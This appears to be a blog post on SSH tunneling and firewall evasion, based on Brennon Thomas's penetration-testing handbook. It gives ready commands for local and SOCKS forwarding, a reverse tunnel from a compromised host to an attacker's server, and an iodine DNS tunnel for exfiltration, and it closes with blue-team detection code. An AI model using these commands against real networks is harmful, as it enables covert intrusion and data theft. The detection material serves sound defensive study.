The 2026 Refactor: Bending the Pipes

A firewall is a set of rules. Rules have exceptions. Tunneling finds them. Brennon Thomas wrote the plumber's handbook and in 2026 every lesson in it still works — the pipes are just carrying more interesting cargo.

A firewall is a set of rules about which traffic is allowed through which ports to which destinations.

Rules have exceptions. Exceptions have geometry. If you understand the geometry, you do not need to break the rules — you route around them through channels the rules were not written to see.

That is the plumber's mindset, and Brennon Thomas's Cyber Plumber's Handbook is the field manual for it. Written as a practical guide to SSH tunneling, pivoting, and traffic redirection for penetration testers, it documents techniques that predate modern security tooling and remain fully operational in 2026 because the underlying protocols have not changed. SSH is still SSH. TCP is still TCP. The pipe is still a pipe.

The sophistication of the monitoring has increased. The geometry of the evasion has not.


Local Port Forwarding: The Wormhole

The entry point is ssh -L. You tell the SSH client to listen on a local port and forward everything it receives through the encrypted tunnel to a destination the remote server can reach.

# Forward local 5432 to an internal database through the jumpbox
ssh -L 5432:database.internal:5432 [email protected]

# Now connect as if the database is sitting on your machine
psql -h localhost -p 5432 -U dbuser

To your client, the database is on localhost. To the network, you are maintaining an SSH session to a jumpbox — which is what developers do all day. The database traffic never appears in the logs as database traffic. It appears as SSH.

In 2016 this bypassed basic firewalls that blocked port 5432 while allowing 22. In 2026 it bypasses identity-aware proxies that monitor HTTPS for anomalous data patterns. The proxy sees SSH. The SSH is carrying the database session. The proxy's behavioral model was trained on HTTPS — it does not have a signature for what developer SSH traffic looks like when it is secretly running an exfiltration.

The geometry did not change. The value of the geometry increased because the monitoring layer got more sophisticated around the ports it was watching and left SSH mostly alone.


SOCKS Proxy: Routing Tools That Don't Know About Proxies

ssh -D opens a SOCKS5 proxy on a local port that routes all traffic through the tunnel. Combined with proxychains, you can force any tool — including tools that have no native proxy support — through the tunnel as if it were running from the remote machine.

# Open SOCKS5 proxy on local 1080 through a cloud instance in a specific region
ssh -D 1080 [email protected]

# Route nmap through it — scan appears to originate from the instance
proxychains nmap -sV -p 22,80,443,3306 10.0.0.0/24

# Route curl through it — HTTP request appears to come from the instance
proxychains curl https://internal-api.example.com/admin

The geofencing use case is underappreciated. Cloud assets and internal APIs frequently allowlist by IP range or region. A SOCKS proxy through a rented or compromised instance in the allowed region is not a VPN — it leaves a different fingerprint, uses legitimate SSH infrastructure, and routes tool traffic that commercial VPNs would not handle cleanly.

proxychains is the force multiplier. Older network scanners, custom scripts, database clients, legacy tools — none of them were built with proxy support. proxychains intercepts their socket calls at the library level and routes them through the SOCKS tunnel. The tools do not know they are being proxied. They run exactly as normal. Their traffic arrives from the remote instance.


The Reverse Tunnel: The Door That Opens from Inside

This is the technique that matters most in 2026 and the one Thomas treats with appropriate gravity.

Most enterprise firewalls operate on a default-deny posture for inbound traffic and a permissive posture for outbound. The logic is sensible: the organization controls what leaves, the internet does not get to initiate connections inward. This posture defeats a large fraction of traditional attack patterns.

The reverse tunnel inverts the direction.

# From the compromised internal host — initiate outbound SSH to attacker's server
# Remote port 2222 on the attacker's server tunnels back to localhost:22 on the victim
ssh -R 2222:localhost:22 [email protected] -N

# Attacker then connects back through the tunnel from their own server
ssh -p 2222 localhost
# Now inside the network — on the compromised machine

The firewall sees an outbound SSH connection from an internal host to an external server. Outbound SSH is allowed. The firewall logs an allowed session and moves on.

What the firewall did not see: the remote port forward that turned that outbound session into a persistent inbound channel. The attacker's server now has a door into the network that will reopen every time the compromised host reconnects — which a persistent agent will do automatically on restart, on network reconnect, on schedule.

The defender only sees traffic between the compromised host and the external server. The attacker's actual IP, their actual infrastructure, their actual location — all of it is behind the plumbing. The ghost location stays hidden behind the pipe.


The Escalation Ladder

SSH is the clean solution. When it is blocked, Thomas documents the escalation:

DNS tunneling. DNS queries are allowed almost everywhere — blocking DNS breaks too much. A DNS tunnel encodes data in subdomain queries, exfiltrates it to an attacker-controlled DNS server, and reconstructs the stream.

# iodine DNS tunnel — runs data through DNS queries
# Server side (attacker controls tunnel.yourdomain.com)
iodined -f -P s3cr3t 10.99.0.1 tunnel.yourdomain.com

# Client side (from behind the restrictive firewall)
iodine -f -P s3cr3t tunnel.yourdomain.com
# Now have a network interface — route traffic through it

High latency. Low bandwidth. Nearly impossible to block without breaking DNS resolution entirely. Used for exfiltration when everything else has been closed.

ICMP tunneling. Ping is allowed in environments where even DNS is monitored. ICMP carries a payload field. That payload field carries data.

Shadowsocks and traffic obfuscation. When the network is Zero Trust and all outbound traffic is inspected, the fallback is making the tunnel look like nothing in particular — random TLS-encrypted junk that does not pattern-match to known protocols. Shadowsocks was designed to evade Chinese firewall deep packet inspection. In 2026 it sees use in environments with equally aggressive traffic analysis.

Each step up the ladder is slower and noisier. The plumber's job is to find the lowest rung that works.


Blue Team: What the Tunnel Looks Like from the Other Side

The detection problem for defenders is that legitimate and malicious SSH traffic look identical at the protocol level. The tells are behavioral.

Volume anomalies on long-lived sessions. A developer SSH session to a jumpbox produces a characteristic traffic pattern — bursts of interactive traffic, keystroke-sized packets, periods of silence. A tunnel carrying database traffic or a remote desktop session produces sustained throughput in one direction. Netflow analysis that baselines per-session bandwidth and flags sustained high-volume SSH sessions catches this.
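The per-session baselining described above, as an added example that is not code from the handbook or from this page: it derives packet-size, throughput, direction and idle-time features from constructed packet records for an interactive login and for a forwarded bulk transfer, then flags the session that departs from the interactive baseline. The 10x-baseline and 1000-byte thresholds are assumptions chosen for the constructed data.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Packet:
    t: float         # seconds since session start
    to_server: bool  # True for client -> server
    size: int        # TCP payload bytes

def interactive_session():
    """Constructed sample: keystroke-sized bursts separated by long pauses."""
    pkts, t = [], 0.0
    for _ in range(6):                           # six bursts of typing
        for _ in range(20):
            pkts.append(Packet(t, True, 36))          # one keystroke
            pkts.append(Packet(t + 0.02, False, 52))  # its echo
            t += 0.15
        t += 20.0                                # operator reads the output
    return pkts

def bulk_session():
    """Constructed sample: 30 s of full-size segments flowing one way (a database
    dump riding inside a forward), with only ACK-sized replies going back."""
    return ([Packet(i * 0.001, False, 1448) for i in range(30_000)]
            + [Packet(i * 0.02, True, 52) for i in range(1_500)])

def profile(pkts, idle_gap=5.0):
    """Features a flow collector can derive without seeing plaintext."""
    times = sorted(p.t for p in pkts)
    duration = max(times[-1] - times[0], 1e-9)
    total = sum(p.size for p in pkts)
    up = sum(p.size for p in pkts if p.to_server)
    idle = sum(b - a for a, b in zip(times, times[1:]) if b - a > idle_gap)
    return {
        "mean_size": total / len(pkts),
        "bytes_per_sec": total / duration,
        "dominant_dir": max(up, total - up) / total,
        "idle_fraction": idle / duration,
    }

def is_bulk_tunnel(feat, baseline_bps, min_size=1000, asym=0.9):
    """Flag sustained, one-directional, full-segment transfer well above the
    per-session bandwidth baseline learned from ordinary jumpbox logins."""
    return (feat["bytes_per_sec"] > 10 * baseline_bps
            and feat["mean_size"] > min_size
            and feat["dominant_dir"] > asym)

if __name__ == "__main__":
    baseline = profile(interactive_session())["bytes_per_sec"]
    for name, s in (("interactive", interactive_session()), ("bulk", bulk_session())):
        print(name, is_bulk_tunnel(profile(s), baseline))
```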

Servers initiating SSH outbound. Interactive reverse tunnels require the compromised host to initiate SSH to an external server. Servers do not do this in normal operation. An EDR alert on sshd spawning outbound connections, or a firewall rule that logs server-to-external SSH, surfaces the callback pattern.

DNS query length distribution. Legitimate DNS queries have a characteristic subdomain length distribution. DNS tunnel queries contain encoded data — they produce longer, higher-entropy subdomains with unusual character distribution. A DNS monitoring system watching for queries with subdomains exceeding 40 characters or with Shannon entropy above the baseline for the environment catches iodine and similar tools.
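The subdomain-length and entropy checks above, written out as an added example that is not code from the handbook or from this page: it learns an entropy baseline from a constructed set of known-good names, then flags queries whose client-controlled labels exceed 40 characters or sit above that baseline. The registered zone is assumed to be the last two labels, and the sample names and the 2-sigma margin are illustrative.

```python
import math
from collections import Counter
from statistics import mean, pstdev

# Constructed sample query names; these are not from a real capture.
BENIGN_QUERIES = [
    "www.example.com", "mail.example.com", "cdn.assets.example.com",
    "api.payments.example.com", "login.corp.example.com",
    "static.images.example.com", "ns1.example.com", "docs.wiki.example.com",
]
# Long, high-entropy labels of the kind a tunnel client emits (constructed).
SUSPECT_QUERIES = [
    "0aq3z7k2p9vbx1n8c5mwe6rtyuiolkjhgfdsazxcvb.tunnel.yourdomain.com",
    "b9f3kd02ls8a4m7znq1xc6vp5rtwyu3oiehg2fjd7.tunnel.yourdomain.com",
]

def encoded_part(qname, zone_labels=2):
    """Everything left of the registered zone (assumed here to be the last two
    labels), dots removed: the portion a tunnel client gets to choose."""
    labels = qname.lower().rstrip(".").split(".")
    return "".join(labels[:-zone_labels])

def shannon_entropy(s):
    """Bits per character of the label text; 0.0 for an empty string."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def entropy_baseline(benign_qnames, sigma=2.0):
    """Environment baseline: mean + sigma * stdev of entropy over known-good names."""
    values = [shannon_entropy(encoded_part(q)) for q in benign_qnames]
    return mean(values) + sigma * pstdev(values)

def classify(qname, entropy_threshold, max_len=40):
    """Return the indicators that fired for one query name (empty list = clean)."""
    part = encoded_part(qname)
    reasons = []
    if len(part) > max_len:
        reasons.append(f"label length {len(part)} > {max_len}")
    h = shannon_entropy(part)
    if h > entropy_threshold:
        reasons.append(f"entropy {h:.2f} > baseline {entropy_threshold:.2f}")
    return reasons

if __name__ == "__main__":
    threshold = entropy_baseline(BENIGN_QUERIES)
    for q in BENIGN_QUERIES + SUSPECT_QUERIES:
        hits = classify(q, threshold)
        print("ALERT" if hits else "ok   ", q, "; ".join(hits))
```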

SOCKS on unexpected ports. proxychains routes through SOCKS. SOCKS has a handshake. An IDS with signatures for SOCKS protocol behavior on non-standard ports catches tools being proxied through tunnels that opened on high ports.

The timing correlation attack. If the monitoring system can see both the internal compromised host's outbound traffic and the external server's inbound traffic, correlation on timing and volume can reconstruct the tunnel relationship even when the traffic content is encrypted. This is expensive to run at scale and requires visibility into both sides — but for high-value targets it is the technique that breaks the geometry.


The 2026 Verdict

The perimeter is dead, the industry keeps saying.

Ports still exist. IP addresses still exist. Protocols still have payload fields. The fundamental geometry of tunneling — wrap one thing inside another, route it through a channel the rules do not cover — has not changed since the techniques Thomas documented were first developed.

The monitoring has become smarter. The evasion has had to become quieter. The escalation ladder has grown more rungs. But the pipe is still a pipe, and the plumber who understands the geometry is still operating in territory the firewall was not built to see.

Thomas wrote the handbook. The refactor keeps it current.


GhostInThePrompt.com // Encryption is the lead. Tunneling is the path. Be the plumber.

Reference: 'The Cyber Plumber's Handbook' — Brennon Thomas (2018).